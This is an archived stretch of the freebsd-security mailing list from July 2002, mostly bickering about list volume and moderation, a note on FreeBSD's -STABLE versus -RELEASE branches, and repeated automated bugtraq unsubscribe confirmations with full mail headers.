Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I would say that -STABLE is just the next mini-RELEASE and it is a matter of naming scheme. The -CURRENT is.. well, the dangerous one, it might be *really* unstable sometimes. But I think this discussion is old enough. I'd suggest searching the mailing list archives for more info about this subject. Regards, --- Plamen D. Petkov, ICQ# 2214327 plamendp@bgstore.com http://www.bgstore.com > As opposed to -CURRENT, yes.
However, > the committers want everyone to realize that > once in a while you might build -STABLE with > something broken (albeit rare, as in the coincidence > of the "blue moon" and "hen's teeth" together...) > but it still could happen. -RELEASE is a -STABLE > that gets frozen for a while to see if any problems > pop up, or if it can be crowed about and burned > to CD with confidence (I hope the RELENG team > doesn't think I'm minimizing their hard work here.) > > Some people read the warning about -STABLE in > the Handbook (that I quoted earlier) and decide only > to run -RELEASE and patch security fixes, and > there is a cvs tag for this, called RELENG_4_x. > This is where a little confusion comes in, because > after a while they quit patching the older releases. > The official line is that it's the current release (4.6) > and the last (4.5) that are being patched, so if > you're still running 4.4-R, (for example) you're no > longer sure you can cvsup with RELENG_4_4 > and get any new patches. > > As I said, -STABLE's running fine for me To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 1:26:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 27D0C37B400 for ; Tue, 2 Jul 2002 01:26:12 -0700 (PDT) Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by mx1.FreeBSD.org (Postfix) with ESMTP id 493A743E09 for ; Tue, 2 Jul 2002 01:26:11 -0700 (PDT) (envelope-from cfaber@fpsn.net) Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g628Q0t07603; Tue, 2 Jul 2002 02:26:00 -0600 (MDT) Message-ID: <3D216380.2E145DF3@fpsn.net> Date: Tue, 02 Jul 2002 02:25:36 -0600 From: Colin Faber Organization: fpsn.net, Inc. 
(http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Michael Bryan , freebsd-security@FreeBSD.ORG Subject: Re: Low-volume list References: <4.3.2.7.2.20020701210911.022a3650@localhost> <4.3.2.7.2.20020701210911.022a3650@localhost> <4.3.2.7.2.20020702021318.00d4d740@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What complaints? The only thing I see on here time after time are complaints about the endless stream of bogus posts from you, Brett. Stop the madness and simply unsubscribe. Heck, why not create your own -security list for the people who so closely follow your posts? Cheers. Brett Glass wrote: > > At 10:59 PM 7/1/2002, Michael Bryan wrote: > > >Yeah, you're right! Too bad the FreeBSD team never thought of that!!! > > > >Oh wait, they did, years ago, explaining why one of my mail folders > >contains -only- FreeBSD security announcements: > > > >http://www.freebsd.org/security/security.html#ml > > > >Sheesh. RTFM. (RTFWP?) > > CFTFWP (Couldn't find the fine Web page), I guess. > > In any event, most people seem to believe that -security is the > low volume list. If that's not its charter, then why all the > complaints when there is (horrors!) a discussion? > > --Brett > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Colin Faber (303) 736-5160 fpsn.net, Inc.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 1:38:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ED25837B401 for ; Tue, 2 Jul 2002 01:38:29 -0700 (PDT) Received: from munkboxen.mine.nu (213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by mx1.FreeBSD.org (Postfix) with ESMTP id 70F8843E13 for ; Tue, 2 Jul 2002 01:38:28 -0700 (PDT) (envelope-from munk@munkboxen.mine.nu) Received: (from munk@localhost) by munkboxen.mine.nu (8.11.6/8.11.6) id g628aFo23305 for freebsd-security@FreeBSD.ORG; Tue, 2 Jul 2002 09:36:15 +0100 (BST) (envelope-from munk) Date: Tue, 2 Jul 2002 09:36:15 +0100 From: Jez Hancock To: freebsd-security@FreeBSD.ORG Subject: Re: Low-volume list Message-ID: <20020702093615.A23291@munkboxen.mine.nu> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <4.3.2.7.2.20020701210911.022a3650@localhost> <3D211BAD.70908@porsche.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3D211BAD.70908@porsche.de>; from perisa@porsche.de on Tue, Jul 02, 2002 at 05:19:09AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 02, 2002 at 05:19:09AM +0200, Marc Perisa wrote: > Brett Glass wrote: > quoting > http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/eresources.html#ERESOURCES-MAIL >SNIP< > /Security issues/ > > FreeBSD computer security issues (DES, Kerberos, known security > holes and fixes, etc). This is a technical mailing list for which > strictly technical content is expected. 
///strictly technical content/// If you read this mail then I guess this list is not moderated, this mail has absolutely nothing to do with technical content... Would it not be acceptable to have a moderator for this list? I'm totally fed up with listening to the whinging and back-biting on this list. Sorry to whinge and back-bite, Jez -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 3:57:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F28A537B400 for ; Tue, 2 Jul 2002 03:57:49 -0700 (PDT) Received: from socrates.thinkhost.com (socrates.thinkhost.com [209.61.191.75]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8895443E2F for ; Tue, 2 Jul 2002 03:57:49 -0700 (PDT) (envelope-from davidzon@socrates.thinkhost.com) Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avke81151; Tue, 2 Jul 2002 06:57:46 -0400 (EDT) (envelope-from davidzon) Date: Tue, 2 Jul 2002 06:57:46 -0400 (EDT) From: "Vladislav S. Davidzon" To: bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com In-Reply-To: <1025322076.19222.ezmlm@securityfocus.com> Message-ID: <20020702065745.G80520-100000@socrates.thinkhost.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 29 Jun 2002 bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. 
> > To confirm that you would like > > freebsd-security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. Each message has your address hidden > inside its return path; for example, mary@xdd.ff.com receives messages > with return path: -mary=xdd.ff.com@securityfocus.com. > > Some mail programs are broken and cannot handle long addresses. If you > cannot reply to this request, instead send a message to > and put the entire address listed above > into the "Subject:" line. > > > --- Administrative commands for the bugtraq list --- > > I can handle administrative requests automatically. Please > do not send them to the list address! Instead, send > your message to the correct command address: > > For help and a description of available commands, send a message to: > > > To subscribe to the list, send a message to: > > > To remove your address from the list, just send a message to > the address in the ``List-Unsubscribe'' header of any list > message. If you haven't changed addresses since subscribing, > you can also send a message to: > > > or for the digest to: > > > For addition or removal of addresses, I'll send a confirmation > message to that address. When you receive it, simply reply to it > to complete the transaction. > > If you need to get in touch with the human owner of this list, > please send a message to: > > > > Please include a FORWARDED list message with ALL HEADERS intact > to make it easier to help you. > > --- Enclosed is a copy of the request I received. 
> > Return-Path: > Received: (qmail 19217 invoked from network); 29 Jun 2002 03:41:16 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:16 -0000 > Received: (qmail 9057 invoked by alias); 29 Jun 2002 03:36:34 -0000 > Received: (qmail 9053 invoked from network); 29 Jun 2002 03:36:34 -0000 > Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) > by mail.securityfocus.com with SMTP; 29 Jun 2002 03:36:34 -0000 > Received: (qmail 13950 invoked by uid 1001); 29 Jun 2002 03:40:08 -0000 > Date: 29 Jun 2002 03:40:08 -0000 > Message-ID: <20020629034008.13949.qmail@mail.securityfocus.com> > From: root@mail.securityfocus.com > Content-Type: text/plain > Content-Disposition: inline > Content-Transfer-Encoding: binary > MIME-Version: 1.0 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > To: bugtraq-unsubscribe-freebsd-security=freebsd.org@securityfocus.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 3:58: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8BD9C37B405 for ; Tue, 2 Jul 2002 03:57:55 -0700 (PDT) Received: from socrates.thinkhost.com (socrates.thinkhost.com [209.61.191.75]) by mx1.FreeBSD.org (Postfix) with ESMTP id 020BC43E0A for ; Tue, 2 Jul 2002 03:57:55 -0700 (PDT) (envelope-from davidzon@socrates.thinkhost.com) Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avr781168; Tue, 2 Jul 2002 06:57:53 -0400 (EDT) (envelope-from davidzon) Date: Tue, 2 Jul 2002 06:57:53 -0400 (EDT) From: "Vladislav S. 
Davidzon" To: bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com Cc: security@FreeBSD.ORG Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com In-Reply-To: <1025322105.19302.ezmlm@securityfocus.com> Message-ID: <20020702065752.U80520-100000@socrates.thinkhost.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 29 Jun 2002 bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. Each message has your address hidden > inside its return path; for example, mary@xdd.ff.com receives messages > with return path: -mary=xdd.ff.com@securityfocus.com. > > Some mail programs are broken and cannot handle long addresses. If you > cannot reply to this request, instead send a message to > and put the entire address listed above > into the "Subject:" line. > > > --- Administrative commands for the bugtraq list --- > > I can handle administrative requests automatically. Please > do not send them to the list address! 
Instead, send > your message to the correct command address: > > For help and a description of available commands, send a message to: > > > To subscribe to the list, send a message to: > > > To remove your address from the list, just send a message to > the address in the ``List-Unsubscribe'' header of any list > message. If you haven't changed addresses since subscribing, > you can also send a message to: > > > or for the digest to: > > > For addition or removal of addresses, I'll send a confirmation > message to that address. When you receive it, simply reply to it > to complete the transaction. > > If you need to get in touch with the human owner of this list, > please send a message to: > > > > Please include a FORWARDED list message with ALL HEADERS intact > to make it easier to help you. > > --- Enclosed is a copy of the request I received. > > Return-Path: > Received: (qmail 19297 invoked from network); 29 Jun 2002 03:41:45 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:45 -0000 > Received: (qmail 9149 invoked by alias); 29 Jun 2002 03:37:02 -0000 > Received: (qmail 9145 invoked from network); 29 Jun 2002 03:37:02 -0000 > Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) > by mail.securityfocus.com with SMTP; 29 Jun 2002 03:37:02 -0000 > Received: (qmail 14047 invoked by uid 1001); 29 Jun 2002 03:40:37 -0000 > Date: 29 Jun 2002 03:40:36 -0000 > Message-ID: <20020629034036.14046.qmail@mail.securityfocus.com> > From: root@mail.securityfocus.com > Content-Type: text/plain > Content-Disposition: inline > Content-Transfer-Encoding: binary > MIME-Version: 1.0 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > To: bugtraq-unsubscribe-security=freebsd.org@securityfocus.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with 
"unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 3:59:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B211E37B400 for ; Tue, 2 Jul 2002 03:59:25 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 9499243E3D for ; Tue, 2 Jul 2002 03:58:52 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 13449 invoked by alias); 2 Jul 2002 10:56:30 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 2 Jul 2002 10:56:30 -0000 Message-ID: <1025607390.13448.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 13442 invoked from network); 2 Jul 2002 10:56:30 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 10:56:30 -0000 Received: (qmail 29185 invoked by alias); 2 Jul 2002 10:52:05 -0000 Received: (qmail 29177 invoked from network); 2 Jul 2002 10:52:05 -0000 Received: from socrates.thinkhost.com (209.61.191.75) by mail.securityfocus.com with SMTP; 2 Jul 2002 10:52:05 -0000 Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avr781168; Tue, 2 Jul 2002 06:57:53 -0400 (EDT) (envelope-from davidzon) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. 
I'm sorry, I've been unable to carry out your request, since the address security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. 
If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 13442 invoked from network); 2 Jul 2002 10:56:30 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 10:56:30 -0000 Received: (qmail 29185 invoked by alias); 2 Jul 2002 10:52:05 -0000 Received: (qmail 29177 invoked from network); 2 Jul 2002 10:52:05 -0000 Received: from socrates.thinkhost.com (209.61.191.75) by mail.securityfocus.com with SMTP; 2 Jul 2002 10:52:05 -0000 Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avr781168; Tue, 2 Jul 2002 06:57:53 -0400 (EDT) (envelope-from davidzon) Date: Tue, 2 Jul 2002 06:57:53 -0400 (EDT) From: "Vladislav S. Davidzon" To: bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com cc: security@FreeBSD.ORG Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com In-Reply-To: <1025322105.19302.ezmlm@securityfocus.com> Message-ID: <20020702065752.U80520-100000@socrates.thinkhost.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII On 29 Jun 2002 bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. 
> > Return-Path: > Received: (qmail 19297 invoked from network); 29 Jun 2002 03:41:45 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:45 -0000 > Received: (qmail 9149 invoked by alias); 29 Jun 2002 03:37:02 -0000 > Received: (qmail 9145 invoked from network); 29 Jun 2002 03:37:02 -0000 > Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) > by mail.securityfocus.com with SMTP; 29 Jun 2002 03:37:02 -0000 > Received: (qmail 14047 invoked by uid 1001); 29 Jun 2002 03:40:37 -0000 > Date: 29 Jun 2002 03:40:36 -0000 > Message-ID: <20020629034036.14046.qmail@mail.securityfocus.com> > From: root@mail.securityfocus.com > Content-Type: text/plain > Content-Disposition: inline > Content-Transfer-Encoding: binary > MIME-Version: 1.0 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > To: bugtraq-unsubscribe-security=freebsd.org@securityfocus.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 3:59:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CB67837B405 for ; Tue, 2 Jul 2002 03:59:26 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 28A7243E35 for ; Tue, 2 Jul 2002 03:58:53 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 13365 invoked by alias); 2 Jul 2002 10:56:24 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 2 Jul 2002 10:56:24 -0000 Message-ID: <1025607384.13364.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: 
freebsd-security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 13358 invoked from network); 2 Jul 2002 10:56:24 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 10:56:24 -0000 Received: (qmail 29140 invoked by alias); 2 Jul 2002 10:51:59 -0000 Received: (qmail 29136 invoked from network); 2 Jul 2002 10:51:58 -0000 Received: from socrates.thinkhost.com (209.61.191.75) by mail.securityfocus.com with SMTP; 2 Jul 2002 10:51:58 -0000 Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avke81151; Tue, 2 Jul 2002 06:57:46 -0400 (EDT) (envelope-from davidzon) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address freebsd-security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. 
Return-Path: Received: (qmail 13358 invoked from network); 2 Jul 2002 10:56:24 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 10:56:24 -0000 Received: (qmail 29140 invoked by alias); 2 Jul 2002 10:51:59 -0000 Received: (qmail 29136 invoked from network); 2 Jul 2002 10:51:58 -0000 Received: from socrates.thinkhost.com (209.61.191.75) by mail.securityfocus.com with SMTP; 2 Jul 2002 10:51:58 -0000 Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avke81151; Tue, 2 Jul 2002 06:57:46 -0400 (EDT) (envelope-from davidzon) Date: Tue, 2 Jul 2002 06:57:46 -0400 (EDT) From: "Vladislav S. Davidzon" To: bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com cc: freebsd-security@FreeBSD.ORG Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com In-Reply-To: <1025322076.19222.ezmlm@securityfocus.com> Message-ID: <20020702065745.G80520-100000@socrates.thinkhost.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII On 29 Jun 2002 bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > freebsd-security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. 
> > Return-Path: > Received: (qmail 19217 invoked from network); 29 Jun 2002 03:41:16 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:16 -0000 > Received: (qmail 9057 invoked by alias); 29 Jun 2002 03:36:34 -0000 > Received: (qmail 9053 invoked from network); 29 Jun 2002 03:36:34 -0000 > Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) > by mail.securityfocus.com with SMTP; 29 Jun 2002 03:36:34 -0000 > Received: (qmail 13950 invoked by uid 1001); 29 Jun 2002 03:40:08 -0000 > Date: 29 Jun 2002 03:40:08 -0000 > Message-ID: <20020629034008.13949.qmail@mail.securityfocus.com> > From: root@mail.securityfocus.com > Content-Type: text/plain > Content-Disposition: inline > Content-Transfer-Encoding: binary > MIME-Version: 1.0 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > To: bugtraq-unsubscribe-freebsd-security=freebsd.org@securityfocus.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 4:23:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B16B737B400 for ; Tue, 2 Jul 2002 04:23:08 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 1BAAF43E13 for ; Tue, 2 Jul 2002 04:23:08 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 14624 invoked by alias); 2 Jul 2002 11:21:41 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 2 Jul 2002 11:21:41 -0000 Message-ID: <1025608901.14623.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: 
freebsd-security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 14618 invoked from network); 2 Jul 2002 11:21:41 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 11:21:41 -0000 Received: (qmail 30426 invoked by alias); 2 Jul 2002 11:17:16 -0000 Received: (qmail 30416 invoked from network); 2 Jul 2002 11:17:13 -0000 Received: from h65n1fls21o70.telia.com (HELO hardcampa) (213.66.190.65) by mail.securityfocus.com with SMTP; 2 Jul 2002 11:17:13 -0000 Received: from uber (brewery [192.168.0.251]) by hardcampa (Postfix) with SMTP id BC5775509 for ; Tue, 2 Jul 2002 13:22:30 +0200 (CEST) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address freebsd-security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. 
Return-Path: Received: (qmail 14618 invoked from network); 2 Jul 2002 11:21:41 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 11:21:41 -0000 Received: (qmail 30426 invoked by alias); 2 Jul 2002 11:17:16 -0000 Received: (qmail 30416 invoked from network); 2 Jul 2002 11:17:13 -0000 Received: from h65n1fls21o70.telia.com (HELO hardcampa) (213.66.190.65) by mail.securityfocus.com with SMTP; 2 Jul 2002 11:17:13 -0000 Received: from uber (brewery [192.168.0.251]) by hardcampa (Postfix) with SMTP id BC5775509 for ; Tue, 2 Jul 2002 13:22:30 +0200 (CEST) Message-ID: <00ce01c221ba$c077b720$fb00a8c0@uber> From: =?iso-8859-1?Q?Christer_S=F6derlund?= To: Subject: Date: Tue, 2 Jul 2002 13:22:29 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 4:23:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 085F537B400 for ; Tue, 2 Jul 2002 04:23:27 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 1752B43E35 for ; Tue, 2 Jul 2002 04:23:25 -0700 